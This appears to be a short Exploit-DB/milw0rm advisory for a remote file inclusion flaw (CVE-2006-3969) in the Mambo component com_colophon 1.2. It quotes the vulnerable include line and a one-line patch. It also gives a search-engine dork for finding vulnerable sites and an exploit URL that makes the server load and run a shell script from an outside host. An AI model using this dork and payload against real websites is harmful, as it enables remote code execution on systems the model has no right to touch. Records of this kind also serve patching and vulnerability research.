Mambo Component 'com_colophon' 1.2 - Remote File Inclusion

Author: Drago84
type: webapps
platform: php
port: 
date_added: 2006-07-28 
date_updated: 2016-10-31 
verified: 1 
codes: OSVDB-27659;CVE-2006-3969 
tags: 
aliases:  
screenshot_url:  
application_url: 

###########  Command Mambo Colophon =<1.2 ##by #Drago84#########

      Found By Drago84
Exclusive Security Italian Security

  This bug allows a remote atacker to execute commands via rfi

page:
  admin.colophon.php

bug:
 require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");

path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_colophon

expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?

# milw0rm.com [2006-07-29]